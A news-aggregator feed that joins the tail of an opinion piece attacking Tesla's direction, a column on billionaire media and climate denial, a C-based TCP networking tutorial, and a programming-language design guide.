For the past few years, while Tesla transformed into the cult stock it is now, it still had to appear at least vaguely realistic. Its plans and technology had to at least theoretically be possible (if not a little moronic). This generated favourable coverage and attracted more people into the cult. As such, for the past six to seven years, Musk had straddled a fine line between outlandish, unrealistic claims to strengthen the cult and a more grounded approach to prevent the whole thing from collapsing.

But this vote wasn’t just about Musk’s pay but about the future direction of Tesla. The conditions Musk has to achieve to get this payday have more to do with self-driving AI and robots than making cars. So a yes vote was a vote for that direction. But, here is the thing: Tesla’s self-driving FSD system is demonstrably dead (read more here ), as is Optimus (read more here ). They will never work, let alone be a viable business, or even be a hyperscale business, as Musk claims they are. Anyone with even a drop of understanding or expertise in these fields can see that. They are not a realistic product and not a realistic way forward for Tesla. The only way they will generate growth is with hype, speculation, and expanding this cult.

As such, this vote was to force Tesla to entirely let go of reality. To indulge Musk in his demonstrably dangerous and unviable delusions, to value speculation and spectacle over material growth or fundamentals, and to enable Musk to cast out anyone who says otherwise.

There is only one problem with this plan: reality catches up to everyone eventually. And when reality comes for cult leaders, things get ugly. Do I need to ask you to Google the Jonestown Massacre?

I have said Tesla is dying for a long time now. But this is the final nail in the coffin. There is now nothing to stop Musk’s self-aggrandising psychosis. The few lifelines that Tesla and Musk’s sanity kept are being severed. Musk is going to push the entire company forward on a falsity, and no one can even ask him not to now, let alone hold him accountable for how reckless and damaging his actions will be. There was once a chance Tesla could turn itself around — to actually remain in the real world and succeed as the automotive giant it was on track to become. But not now. After this, there is no saving Tesla.

is a climate & politics journalist who is pissed off that the world is burning, corrupt and broken, yet no one in power seems to care.

Media Monopoly Fuels Climate Denial

Portside
portside.org
2025-11-15 02:41:26
Media Monopoly Fuels Climate Denial barry Fri, 11/14/2025 - 21:41 ...
Original Article

Illustration: Thomas Pullin/The Guardian

If this were just a climate crisis, we would fix it. The technology, money and strategies have all been at hand for years. What stifles effective action is a deadly conjunction: the climate crisis running headlong into the epistemic crisis.

An epistemic crisis is a crisis in the production and delivery of knowledge. It’s about what we know and how we know it, what we agree to be true and what we identify as false. We face, alongside a global threat to our life-support systems, a global threat to our knowledge-support systems.

Let’s start by recognising that they were never robust. There was no golden age of public knowledge, no moment at which the information most people received was largely unbiased and accurate. Throughout modern history, European societies have formed a broad consensus around blatant falsehoods: such as the view that the monarch embodied all the interests of the nation, that women were unsuited to public life, that Black and Brown people were inferior beings, that empire was a force for good. A vast infrastructure of persuasion was built around these beliefs. Public knowledge is always shaped by power.

The promise of democracy was that the lives of all would steadily improve as knowledge spread: we would turn our gathering understanding of the world into social progress. For a while, in some places, we did. But that era now seems to be coming to an end.

The fundamental problem is this: that most of the means of communication are owned or influenced by the very rich . If democracy is the problem capital is always trying to solve, propaganda is part of the solution. Like the kings and empire-builders of the past, they use their platforms to project the claims that suit them and suppress the claims that don’t. This means boosting right and far-right movements, which defend wealth and power against those who wish to redistribute them.

In the US, we witness a rapid and extreme hardening of this position, as Trump’s allies, old and new, sweep up legacy media platforms – it seems obvious that the result will be ever more unhinged attacks on anyone who challenges capital.

The ultra-rich have also pumped money into new media, such as the online shows that now outrank traditional television news. For example, two fracking billionaires have poured $8m (£6m) into PragerU and $4.7m into the Daily Wire, to extend the reach of these platforms.

Of the world’s 10 most popular online shows, a Yale study shows eight have spread climate science denial. Joe Rogan, who hosts one of the world’s most popular shows, has repeatedly claimed that the Earth is cooling, drawing on research that says the opposite.

A new investigation of Elon Musk’s X by Sky News found that every account set up by reporters, “no matter their political orientation, was fed a glut of rightwing content”, much of which was extreme. The experts it consulted believe this pattern could have resulted only from an algorithm engineered for this purpose, and that “an algorithmic bias must be decided by senior people at the channel”. (X, for its part, told Sky News it was “dedicated to fostering an open, unbiased public conversation”.) A separate study found the spread of misinformation on X is most associated with politicians on the radical right: mainstream or leftist representatives are far less likely to spread falsehoods. The radical right leans heavily into climate science denial and obstruction of environmental measures: this is why it is sponsored by fossil fuel companies .

Capital has willing workers even in the media that aren’t owned by billionaires. A devastating new article by Peter Coviello, professor of American literature at the University of Illinois, records how he and his former college became collateral damage in the campaign waged by the New York Times against Zohran Mamdani, now mayor-elect of New York City. Coviello explains a process grimly familiar to climate scientists: equating expert opinion with commentary from paid lobbyists. No attempt is made to examine “the relation between those two ‘sides,’ or their histories, or their sponsors, or their relative evidentiary authority”. If, he argues, you have the money to fund a junktank, it will produce whatever opinion you request, then papers such as the New York Times will balance that opinion against decades of academic study, as if the two things are of equal weight.

This also describes the BBC’s understanding of “impartiality”. While it no longer provides a platform for outright climate denial, almost every day it breaks its own editorial guidelines by hosting Tufton Street junktanks (which often argue against environmental action) without revealing who funds them. Shouldn’t we be allowed to know whether or not they are sponsored by fossil fuel companies?

The BBC told its presenter Evan Davis to stop making his own podcast about heat pumps, on the grounds that discussing this technology meant “treading on areas of public controversy”. Why are heat pumps controversial? Because the Energy and Utilities Association, which lobbies for gas appliances, paid a public affairs company to make them so. The company, WPR, boasted that it set out to “ spark outrage ”. The media, BBC included, were all too happy to oblige.

None of this has obliged any BBC executive to resign. Nor did the plan discussed by former director general Tim Davie and former head of news Deborah Turness to alter “story selection and other types of output, such as drama” to “ address low trust issues with Reform voters”. Nor did editing an interview with Jeremy Corbyn to produce a misrepresentation far more serious than Panorama’s edit of a speech by Donald Trump. Nor did its mock-up of a Soviet propaganda poster featuring Corbyn, using the classic Stalinist image of a rayed red dawn . I cannot think of an occasion on which anyone at the BBC has had to resign for misrepresenting a leftwinger. But the appeasement of the right never ends, and nor will it ever be satisfied.

In this media climate, it’s not surprising that governments are retreating from climate action. In June, a review by the International Panel on the Information Environment found that “ inaccurate or misleading narratives ” in the media about climate breakdown create “a feedback loop between scientific denialism and political inaction”. The results can be seen at the current Cop30 climate talks, whose president, André Corrêa do Lago, remarks on a “ reduction in enthusiasm ” among rich nations.

It didn’t happen by accident. It’s the product of a deliberate and systematic assault on knowledge by some of the richest people on Earth. Preventing climate breakdown means protecting ourselves from the storm of lies.

The Guardian is globally renowned for its coverage of politics, the environment, science, social justice, sport and culture. Scroll less and understand more about the subjects you care about with the Guardian's brilliant email newsletters , free to your inbox.

The Internet Is Cool. Thank You, TCP

Hacker News
cefboud.com
2025-11-15 06:37:50
Comments...
Original Article

The Internet is Cool. Thank you, TCP

The internet is incredible. It’s nearly impossible to keep people away from. But it can also be unreliable: packets drop, links congest, bits mangle, and data corrupts. Oh, it’s dangerous out there! (I’m writing this in Kramer’s tone)

So how is it possible that our apps just work? If you’ve networked your app before, you know the drill: socket() / bind() here, accept() there, maybe a connect() over there, and it just works. Reliable, orderly, uncorrupted data flows to and fro.

Websites (HTTP), email (SMTP) or remote access (SSH) are all built on top of TCP and just work.

Why TCP

Why do we need TCP? Why can’t we just use the layer below, IP?

Remember, the network stack goes: Physical –> Data Link (Ethernet/Wi-Fi, etc) –> Network (IP) –> Transport (TCP/UDP).

IP (Layer 3) operates at the host level, while the transport layer (TCP/UDP) works at the application level using ports. IP can deliver packets to the correct host via its IP address, but once the data reaches the machine, it still needs to be handed off to the correct process. Each process “binds” to a port: its address within the machine. A common analogy is: the IP address is the building, and the port is the apartment. Processes or apps live in those apartments.

Another reason we need TCP is that if a router (a piece of infra your average user does not control) drops packets or becomes overloaded, TCP at the edges (on the users’ machines) can recover without requiring routers to participate. The routers stay simple, the reliability happens at the endpoints.

Packets get lost, corrupted, duplicated, and reordered. That’s just how the internet works. TCP shields developers from these issues. It handles retransmission, checksums, and a gazillion other reliability mechanisms. If every developer had to implement those themselves, they’d never have time to properly align their flexboxes, a truly horrendous alternate universe.

Jokes aside, the guarantee that data sent and received over a socket isn’t corrupted, duplicated, or out of order, despite the underlying network being unreliable, is exactly why TCP is awesome.

Flow and Congestion Control

When you step back and think about network communication, here’s what we’re really trying to do: machine A sends data to machine B. Machine B has a finite amount of space and must store the incoming data somewhere before passing it to the application, which might be asleep or busy. This temporary storage takes the name of a receive buffer and is managed by the kernel:

sysctl net.ipv4.tcp_rmem => net.ipv4.tcp_rmem = 4096 131072 6291456 , a min of 4k, default of 128k and max of 8M.

The problem is that space is finite. If you’re transferring a large file (hundreds of MBs or even GBs), you could easily overwhelm the destination. The receiver therefore needs a way to tell the sender how much more data it can handle. This mechanism is called flow control , and TCP segments include a field called the window , which specifies how much data the receiver is currently willing to accept.

Another issue is overwhelming the network itself, even if the receiving machine has plenty of buffer space. You’re only as strong as your weakest link: some links carry gigabits, others only megabits. If you don’t tune for the slowest link, congestion is inevitable.

Fun fact: in 1986, the Internet’s bandwidth dropped from a few dozen KB/s to as low as 40 bps (yes, bits per second! yes, those numbers are wild!), in what became known as congestion collapse . When packets were lost and systems retried sending them, they made congestion even worse: a doom loop. To fix this, TCP incorporated ‘play nice’ and ‘back off’ behaviors known as congestion control , which help prevent the Internet from clogging itself to death.

Some Code: A Plain TCP Server

With all low-level things like TCP, C examples are the way to go. Just show it like it is.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <signal.h>

int sockfd = -1, clientfd = -1;
void handle_sigint(int sig) {
    printf("\nCtrl+C caught, shutting down...\n");
    if (clientfd != -1) close(clientfd);
    if (sockfd != -1) close(sockfd);
    exit(0);
}

int main() {
    signal(SIGINT, handle_sigint);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    int opt = 1;
    // SO_REUSEADDR to force bind to the port even if an older socket is still terminating (TIME_WAIT)
    setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));

    struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(8080), .sin_addr.s_addr = INADDR_ANY };
    bind(sockfd, (struct sockaddr*)&addr, sizeof(addr));
    listen(sockfd, 5);
    printf("Listening on 8080...\n");

    clientfd = accept(sockfd, NULL, NULL);
    char buf[1024], out[2048];
    int n;
    while ((n = recv(clientfd, buf, sizeof(buf) - 1, 0)) > 0) {
        buf[n] = '\0';
        int m = snprintf(out, sizeof(out), "you sent: %s", buf);
        printf("response %s %d\n", out, m);
        send(clientfd, out, m, 0);
    }
    close(clientfd); close(sockfd);
}

This create a TCP server that echoes what the client sends prefixed with ‘You sent:’.

1
2
3
4
5
6
# compile and run server
gcc -o server server.c  && ./server
# connect client
telnet 127.0.0.1 8080
# hi
# you sent: hi

127.0.0.1 (localhost) could be replace with a remote IP and it should work all the same.

We used the following primitives/functions follow the Berkley Socket way of doing things (released with BDS 4.2):

  • SOCKET : create an endpoint (structure in the kernel).
  • BIND : associate to a port.
  • LISTEN : get ready to accept connection and a specify queue size of pending connection (beyond that size, drop!)
  • ACCEPT : accept an incoming connection (TCP Server)
  • CONNECT : attempt connection (TCP client)
  • SEND : send data
  • RECEIVE : receive data
  • CLOSE : release the connection

In the example above, we’re using client/server dynamics in a request/response pattern. But I can add the following after send :

1
2
3
4
send(clientfd, out, m, 0);
sleep(5);
const char *msg = "not a response, just doing my thing\n";
send(clientfd, msg, strlen(msg), 0);

Compile, run, and telnet:

1
2
3
4
5
client here
you sent: client here
client again
not a response, just doing my thing
you sent: client again

I typed in the telnet terminal: client here , then client again . I only got you sent: client here , then the server was sleeping. My second line, client again , was patiently waiting in the receive buffer. The server sent not a response, just doing my thing , then picked up my second TCP packet and replied with you sent: client again .

This is very much a duplex bidirectional link. Each side sends what it wishes, it just happens that at the beginning, one listens and the other connects. The dynamics afterwards don’t have to follow a request/response pattern.

Catfishing Curl: A Dead Simple HTTP Server

Let’s create a very simple HTTP/1.1 server (later versions are trickier).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
    // same as before
    printf("Listening on 8080...\n");
    int i = 1;
    while (1) {
        clientfd = accept(sockfd, NULL, NULL);
        char buf[1024], out[2048];
        int n;
        while ((n = recv(clientfd, buf, sizeof(buf) - 1, 0)) > 0) {
            buf[n] = '\0';
            int body_len = snprintf(out, sizeof(out), "[%d] Yo, I am a legit web server\n", i++);

            char header[256];
            int header_len = snprintf(
                header, sizeof(header),
                "HTTP/1.1 200 OK\r\n"
                "Content-Type: text/plain\r\n"
                "Content-Length: %d\r\n"
                "Connection: close\r\n"
                "\r\n",
                body_len
            );
            printf("header: %s\n", header);
            printf("out: %s\n", out);
            send(clientfd, header, header_len, 0);
            send(clientfd, out, body_len, 0);
            break;   // one request per connection
        }
        close(clientfd);
    }

1
2
3
4
~ curl localhost:8080                                                                                               
[1] Yo, I am a legit web server
~ curl localhost:8080
[2] Yo, I am a legit web server

We’re using i to keep count of requests. We’re establishing a TCP connection and returning the HTTP headers expected by the HTTP client (the TCP peer, really). A real HTTP server would return proper HTML, CSS, and JS, and handle a whole lot of other options and headers. But underneath, it’s simply a process making use of our reliable, dependable TCP.

The Actual Bytes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
  0                   <----- 32 bits ------>                     
  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |        Source Port              |     Destination Port        |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                        Sequence Number                        |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                    Acknowledgment Number                      |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 | Header|Rese-|   Flags   |       Window Size                   |
 | Len   |rved |           |                                     |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |       Checksum                  |     Urgent Pointer          |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                    Options (if any)                           |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                    Data (Payload)                             |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Each TCP segment has the header above. And each TCP segment is contained within a IP packet. We have a source and destination ports. Each 16 bits, and that’s where the 64k port limit comes from!

Each transport-layer connection is 5-tuple (TCP/UDP, src IP, src port, dst IP, dst port) .

Sequence and Acknowledgment Numbers

TCP reliability depends on two key fields: the Sequence number , indicating which bytes a segment carries, and the Acknowledgment number , indicating which bytes have been received. Sequence numbers let the receiver interpret data order, detect and reorder out-of-order segments, and identify losses. TCP uses cumulative acknowledgments —an ACK of 100 means bytes 0-99 were received. If bytes 100-120 are lost but later bytes arrive, the ACK remains 100 until the missing data is received.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
1. A --> B: Send [Seq=0-99]
2. B --> A: Send [Seq=0-49]

3. B --> A: Receives A's [0-99] --> sends ACK=100
4. A --> B: Receives B's [0-49] --> sends ACK=50

5. A --> B: Send [Seq=100-199]   --- lost ---
6. B --> A: Send [Seq=50-99]     --- lost ---

7. A --> B: Send [Seq=200-299]
   B receives --> notices gap (100-199 missing) --> sends ACK=100

8. B --> A: Send [Seq=100-149]
   A receives --> notices gap (50-99 missing) --> sends ACK=50

9. A --> B: Send [Seq=300-399]
   B still missing 100-199 --> sends ACK=100

10. B --> A: Send [Seq=150-199]
    A still missing 50-99 --> sends ACK=50

11. A --> B: Retransmit [Seq=100-199]
    B receives --> now has 0-399 --> sends ACK=400

12. B --> A: Retransmit [Seq=50-99]
    A receives --> now has 0-199 --> sends ACK=200

Header Length shows how many 4-byte words are in the header, needed because the Options field is variable length, and thus so is the header.

TCP Flags

Next are 8 flags (1 bit each). A few important ones:

SYN : used to establish a connection. ACK : indicates the Acknowledgment number is valid.

These two flags are central to connection setup. Why establish a connection? To detect out-of-order or duplicate segments you must track what has been sent and received i.e., maintain a state or a connection.

SYN and ACK participate in the famous 3-way handshake:

  • A –> B: SYN (I want to connect)
  • B –> A: SYN + ACK (I got your SYN, I want to connect too!)
  • A –> B: ACK (got it, connection established!)

The FIN flag signals teardown and also uses a handshake:

  • X –> Y: FIN (I want to disconnect)
  • Y –> X: ACK (got your FIN, whatever!)
  • Y –> X: FIN (I want to disconnect too - sometimes sent with the previous ACK)
  • X –> Y: ACK (got it!)

This is normally a 4-way (sometimes 3-way) goodbye handshake.

RST is the reset flag. It indicates an error or forced shutdown — drop the connection immediately. An OS sends RST if no process is listening or if the listening process crashed. There’s also a known TCP reset attack where intermediaries inject RST to terminate connections (used by some firewalls).

Window

We talked about this field in flow control. As mentionned above, this indicates how many bytes the receiver is willing to receive after the acknowledged number.

With the example above, running ss (Socket Statistics) provides info about the TCP connection.

1
2
3
4
ss -tlpmi
// State    Recv-Q   Send-Q       Local Address:Port           Peer Address:Port   Process    
// LISTEN   0        5                  0.0.0.0:http-alt            0.0.0.0:*       users:(("server",pid=1113,fd=3))
// 	 skmem:(r0,rb131072,t0,tb16384,f0,w0,o0,bl0,d0) cubic cwnd:10

rb131072 (128KB) is the receive buffer size, while tb16384 (16KB) is the transmit buffer size, where data waits before being sent over the network. Send-Q indicates bytes not yet acknowledged by the remote host, and Recv-Q shows bytes received but not yet read by the application (e.g., data waiting in from the second line in telnet session above, while the server was sleeping).

Checksum

Checksum is used for reliability. All 16-bit words in the TCP segment are added together, and the result is compared to the checksum. If they don’t match, it means some bits were likely corrupted, and retransmission is needed.

Conclusion

It always amazes me how all this works. The network, the internet. Reliably and continuously. Just a few decades ago, sending a few KB was quite the feat. And today, streaming 4k is banal. God bless all those hardworking people that made and make it all possible!

Ohm Editor

Hacker News
ohmjs.org
2025-11-15 06:01:29
Comments...
Original Article

So, you want to design your own language?

Hacker News
cs.lmu.edu
2025-11-15 05:44:43
Comments...
Original Article

Language Design

So, you want to design your own language? Of course you do. Or perhaps you are taking a class and are being forced to create a programming language under penalty of a bad grade. What kinds of things do you need to know?

Designing a Language

Of course you want to design (and implement!) your own programming language! It’s fun. It’s creative. It’s empowering.

How do we do it? In a nutshell, the process is iterative, cycling between four phases:

languagedesign.png

Doing the phases over and over is important; for example, while writing the compiler, you may be like “woah this is impossible” and then realize “oh shoot this part of the language wasn’t designed right!”

Prerequisites

It helps to be experienced. If you’re not, that’s okay, actually—you might get lucky!

But don’t mistake creativity for luck that shows up without pre-existing knowledge. The most creative people are those with a lot of knowledge and experience. So you should still study and practice!

Your success as a language designer will be massively aided by knowledge in three main areas:

  1. Programming Paradigms . You should know a number of different ways that computations can be structured. These include: imperative declarative structured object-oriented functional applicative concatenative logic protocol-oriented aspect-oriented array event-driven dataflow agent-based etc.

    See Wikipedia’s list of programming paradigms .

  2. Programming Language Concepts . You should have a good sense of most, if not all, of the following things: Sequencing, conditional execution, iteration, recursion, functional decomposition, modularity, synchronization, metaprogramming, binding, scope, extent, volatility, subtyping, pattern matching, type inference, closures, prototypes, introspection, instrumentation, annotations, decorators, memoization, traits, streams, monads, actors, mailboxes, comprehensions, continuations, wildcards, promises, regular expressions, proxies, transactional memory, inheritance, polymorphism, parameter modes, type classes, generics, reflection, concurrency, parallelism, distribution, persistence, transactions, garbage collection, and many more terms.

    I’m working on a glossary of such terms that may be helpful to review.

  3. Existing ProgrammingLanguages . It’s nice to have a feel for a variety of languages. Here are a few that are good to be familiar with (and the reasons why they are good to study):
    • Python , for basic imperative programming and scripting
    • Smalltalk , for OOP done beautifully
    • JavaScript , for event-driven features, async, and promises
    • Io , for ideas on building up everything from a minimal semantics
    • Julia , for multiple dispatch
    • Clojure , Racket , Scheme , and Common Lisp , for Lispiness (macros, etc.)
    • Standard ML , OCaml , F# , and Elm , for Hindley-Milner typing and more
    • Haskell , for typeclasses and functional purity
    • eToys , Scratch , Snap! , and GP for the blocks approach
    • Java and C# , for being enterprisey
    • Kotlin , Ceylon , and Scala , as examples of evolving Java
    • Erlang and Elixir , for expressing concurrent processes in a distributed fashion
    • Fortran , Chapel , and Parasail , for expressing muticore and parallel programming
    • PureScript , TypeScript , and ClojureScript , as examples of evolving JavaScript
    • C , because it is the quintessential systems language
    • C++ , Rust , Zig , and Odin for making systems programming less painful and more secure
    • Go and Swift , for more examples of modern, but generally mainline, ideas
    • J and K , for array programming
    • Idris , for dependent typing
    • Prolog and Mercury , for logic programming
    • Forth and Factor , for concatenative programming
    • Quipper , because it’s a language for quantum computing
    • Brainfuck , Malbolge , LOLCODE , Whitespace , and other classic esoterics
    • GolfScript , CJam , Pyth , Jelly , and other golfing languages, because this gives you a good sense of putting power into small syntactic constructs
    • Piet and Hexagony , for, well, check them out....

    Also check out this mini-encyclopedia of 70 languages .

    Here are some excellent cross-language comparisons that help you to hone your understanding of how different syntaxes can express the same ideas:

    These are really good too:

Getting Ready

Remember, many people have designed languages before you. They made mistakes. They came up with brilliant ideas. Many were wildly successful. Some never made it big. Some people have brought in years of research on how people think and learn to come up with principles for language (and environment) design.

You should learn form their experiences.

Study classic papers. Read web essays. Visit online courses. Here is a small sampling of things to study and places to look for more information:

Think about the future:

And understand that traditional, mainstream programming languages, are not at all the epitome of computational expression. Languages can be much more:

Getting Started

Ready to strike out on your own? Here are some things to think about, in the form of a, you guessed it, a checklist:

  • Do you have a specific audience in mind? Artists? Graphic designers? AI researchers? Numeric and Scientific nerds? Natural language types? Game developers? Machine learning people? Animators? High performance folks? System programmers? Or do you want a general purpose language? Or do you just want to do what you want?
  • Understand the audience that the language is designed for, and what kinds of things they want to create with it (or problems they want to solve with it).
  • Determine if your language is to be (1) a reasonable, usable language or (2) an esoteric/joke/golfing language.
  • Determine if it is to be pragmatic, idealistic, researchy, or evil.
  • Determine whether you want your language firmly in one camp—OO, functional, logic, concatenative, plain-imperative—or be a multiparadigm symphony. Or a multiparadigm cacophony.
  • Determine whether it is to be built on a single characteristic building block (a crystallization of style ) or one with a huge variety of syntactic forms for multiple semantic aspects (an agglutination of features ).
  • Determine your concurrency model. Do you want all your programs to be single-threaded and sequential? Or are you looking for something event-driven and async? Or multithreaded? Or distributed?

Choosing a Starter Set of Features

Come up with a list of capabilities, or features. Make sure they enable programmers to express their creations by following the suggestions and principles in the Learnable Programming essay, including:

  • Make meaning transparent
  • Explain in context
  • Make flow and time tangible and visible
  • Show the data, and avoid hidden state
  • Use metaphor
  • Allow easy decomposition and recomposition
  • Allow the programmer to write readable code—you do support mentioning parameter names in calls, right?

Exercise : Skim the Learnable Programming essay. Or, better, read the whole thing

if

when you have time.

What kind of questions might you have here? Here are some totally random ideas:

  • If your language supports functions:
    • Must you pass the exact number of arguments the function expects?
    • Can you specify parameter names in the call?
    • Do you have rest parameters? optional parameters? keyword parameters? default parameters?
    • Are the parameters typed?
    • Can parameters be modified? Are they passed by value, value-result, reference, name, etc?
    • Are arguments evaluated L-R, R-L, in parallel, or in arbitrary order?
    • How does a function return a value? Can it return zero or more values or just one?
    • Are functions first-class? If so, do you use deep binding or shallow binding?
    • Is recursion allowed?
    • Can you test functions for equality?
    • Can functions be anonymous?
  • What is your type system like?
    • Static vs. dynamic, strong vs. weak, manifest vs. implicit?
    • Do you distinguish primitive types from reference types?
    • Do you have all those different numeric types based on bit size? What about decimals and ratios?
    • Do you have a separate character type? A separate boolean type?
    • Can you get the type of an expression at runtime?
    • Are types objects?
    • Do you have supertypes and subtypes? Multiple-inheritance? If so, how do you handle name collisions?
    • Are types the same as classes? Can you add new types?
    • Do you have both sum and product types?
    • Do functions have a type?
    • Are there pointer types?
    • Are there parameterized types? If so, are they (mostly) covariant, contravariant, or invariant?
    • Any dependent types?
  • What do your expressions look like?
    • And does your runtime follow eager or lazy evaluation? Or both?
    • Do you have only prefix, only postfix, only infix, or a wild mix of operators?
    • Can you overload operators? If so, how?
    • Can you change the precedence of operators? Even the built-in ones? At runtime?
    • How much type inference do you have?
    • Can you mark variables as mutable or immutable?
    • Are your variables bound or assigned? Can they be assigned more than once?
    • Do you have destructuring and/or pattern matching?
    • How do you determine scope? Do you implicitly or explicitly import into inner scopes?
    • Are there keywords that define access like public , private , and protected , or are there conventions, like in Go, where capitalized entities are implicitly exportable and lower-cased entities are private?
    • Is there a let -expression for super-local scopes?
    • Is shadowing allowed?
    • Do you have anything like JavaScript’s this expression?
  • How do you express control flow?
    • Do you like expression-orientation or do you have real statements?
    • How do you express sequential flow vs. nondeterministic flow vs. parallel flow?
    • If you have nondeterminism, how do you ensure fairness?
    • Must guards in a multiway selection be executed in any particular order?
    • Do you have short-circuit operators? Iterator objects? Generators?
    • Do you have all the loops: (1) forever, (2) n times, (3) while/until a condition, (4) through a numeric range (with an optional step size), or (5) through a collection?
    • Do you have break and continue ? Anything like Ruby’s retry and redo ?
    • Do you have exceptions? Or do you need Go-style constructs? Or do you have nullables everywhere?
    • Do you have a timer for sleeping, delaying execution, or running on intervals?
    • Can I haz goto ?
  • How do you support concurrency?
    • Threads, or events?
    • Shared memory only? Message passing only? Or both? If shared memory, is it mutable? If so, do you have locks, higher-level synchronization devices, or some kind of transactional memory?
    • Do you support different levels of granularity of concurrency?
    • Are tasks spawned implicitly when their enclosing block begins, or do they require explicit invocation?
    • Do tasks die when the enclosing block or spawning task terminates? Or does the spawner wait for all internal tasks to terminate?
    • Do taks know who started them?
    • If an asynchronous task is launched, how is a result obtained? Callback, promise, or some other mechanism?
    • Is message passing done via named channels, named processes, or bulletin board?
    • Is message passing always synchronous, asynchronous, or both?
    • Is there timed or conditional synchronization mechanisms?
    • Can tasks detect their own state?
  • How meta are you?
    • Can a program get a list of its global variables, loaded classes, top-level functions, etc.? Can a class get a list of its fields, methods, constructors, superclass(es), subclasses, etc.? Can a function get its parameters, locals, return types, etc.?
    • Can a function find out who called it?
    • Can a variable be read or set via its name (a string) only? Can a function or method be invoked by its name (a string) only? Can new variables or types or functions be created at run time, given only their name and some indication of how they should look?
    • Does the language have a macro system? If so, is it string-based or AST-based?
    • Is it possible to unquote within a macro?
    • Are macros hygienic? What syntactic devices are provided to explicitly capture in- scope variables, if any?
What did I just read?

Feeling like only about 20% of the questions above made any sense? Feeling like that vocabulary came out of nowhere? That’s fine for now. Learning about programming languages can be a never-ending lifelong journey, but you can use the questions you don’t quite understand now as a place to start some research.

Oh, I have a glossary you might find helpful.

From Features To Abstract Syntax

When you have a good idea of your language features, you’ll want to figure out a good way to organize them, structurally. This is known as your language’s abstract syntax . In an abstract syntax we don’t worry much about punctuation and parentheses and such microscopic details. We are interested in the overall structure. Here’s a look at abstract syntax trees in JavaScript:

When defining your language, you will want to specify exactly what the AST Nodes are, how they are related to each other, and what their properties are. For JavaScript, the AST Node types come from a specification called EsTree . I've summarized the main interfaces here:

Program sourceType:["script"|"module"] body:[Statement|ModuleDeclaration]
Statement
    Declaration
        FunctionDeclaration(Function) id:Identifier
        VariableDeclaration declarations:[VariableDeclarator] kind:("var"|"let"|"const")
        ClassDeclaration(Class) id:Identifier
    EmptyStatement
    DebuggerStatement
    ExpressionStatement expression:Expression
    BlockStatement body:[Statement]
    ReturnStatement argument:Expression?
    LabeledStatement label:Identifier body:Statement
    BreakStatement label:Identifier?
    ContinueStatement label:Identifier?
    IfStatement test:Expression consequent:Statement alternate:Statement?
    SwitchStatement discriminant:Expression cases:[SwitchCase]
    WhileStatement test:Expression body:Statement
    DoWhileStatement body:Statement test:Expression
    ForStatement init:(VariableDeclaration|Expression)? test:Expression? update:Expression? body:Statement
    ForInStatement left:(VariableDeclaration|Pattern) right:Expression body:Statement
        ForOfStatement await:boolean
    ThrowStatement argument:Expression
    TryStatement block:BlockStatement handler:CatchClause? finalizer:BlockStatement?
    WithStatement object:Expression body:Statement
Function id:Identifier? params:[Pattern] body:BlockStatement generator:bool async:bool
VariableDeclarator id:Pattern init:Expression?
SwitchCase test:Expression? consequent:[Statement]
CatchClause param:(Pattern?) body:BlockStatement
Expression
    ThisExpression
    Identifier(Pattern) name:string
    Literal value:(string|bool|number|Regexp|bigint)?
        RegExpLiteral regex:{pattern:string flags:string}
        BigIntLiteral bigint:string
    ArrayExpression elements:[(Expression|SpreadElement)?]
    ObjectExpression properties:[Property|SpreadElement]
    FunctionExpression(Function)
    ArrowFunctionExpression(Function) body:(BlockStatement|Expression) expression:bool
    UnaryExpression operator:UnaryOperator prefix:bool argument:Expression
    UpdateExpression operator:UpdateOperator argument:expression prefix:bool
    BinaryExpression operator:BinaryOperator left:Expression right:Expression
    AssignmentExpression operator:AssignmentOperator left:Pattern right:Expression
    LogicalExpression operator:LogicalOperator left:Expression right:Expression
    MemberExpression(ChainElement) object:(Expression|Super) property:Expression computed:bool
    ChainExpression expression:ChainElement 
    ConditionalExpression test:Expression consequent:Expression alternate:Expression
    CallExpression(ChainElement) callee:(Expression|Super) arguments:[(Expression|SpreadElement)]
    YieldExpression argument:Expression? delegate:bool
    TemplateLiteral quasis:[TemplateElement] expressions:[Expression]
    TaggedTemplateExpression tag:Expression quasi:TemplateLiteral
    NewExpression
    SequenceExpression expressions:[Expression]
    ClassExpression(Class)
    AwaitExpression argument:Expression
    ImportExpression source:Expression
    MetaProperty meta:Identifier property:Identifier
Class id:Identifier? superClass:Expression? body:ClassBody
ClassBody body:[MethodDefinition]
MethodDefinition key:Expression value:FunctionExpression kind:("constructor"|"method"|"get"|"set") computed:bool static:bool
SpreadElement argument:Expression
Property key:Expression value:Expression kind:("init"|"get"|"set") method:bool shorthand:bool computed:bool
    AssignmentProperty value:Pattern kind:"init" method:false
Pattern
